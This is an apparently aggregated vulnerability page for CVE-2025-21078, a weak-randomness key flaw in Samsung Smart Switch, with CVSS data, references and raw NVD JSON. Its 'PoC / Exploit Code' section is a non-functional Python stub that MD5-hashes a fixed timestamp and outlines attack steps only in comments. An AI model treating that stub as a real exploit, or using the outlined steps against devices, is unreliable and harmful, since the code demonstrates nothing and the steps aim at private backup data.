CVE-2025-21078

Description

Use of insufficiently random value of secretKey in Smart Switch prior to version 3.7.68.6 allows adjacent attackers to access backup data from applications.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:smart_switch:*:*:*:*:*:*:*:* - VULNERABLE

Smart Switch < 3.7.68.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import hashlib
import secrets

# CVE-2025-21078 PoC - Samsung Smart Switch密钥预测
# 此PoC演示了如何利用弱随机数生成漏洞

def generate_predictable_key():
    # 模拟不安全的密钥生成
    timestamp = 1234567890
    seed = hashlib.md5(str(timestamp).encode()).hexdigest()
    return seed

def exploit_backup_access(target_ip):
    # 步骤1: 监听相邻网络获取时间戳
    # 步骤2: 预测密钥
    # 步骤3: 解密备份数据
    pass

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-21078
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-21078
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-21078/
[4] VulDB https://vuldb.com/cve/CVE-2025-21078
[5] https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=11

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-21078", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:34.103", "lastModified": "2025-11-07T15:46:38.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of insufficiently random value of secretKey in Smart Switch prior to version 3.7.68.6 allows adjacent attackers to access backup data from applications."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:smart_switch:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.68.6", "matchCriteriaId": "147D1C7F-B40F-4638-84B9-8132366F7323"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=11", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}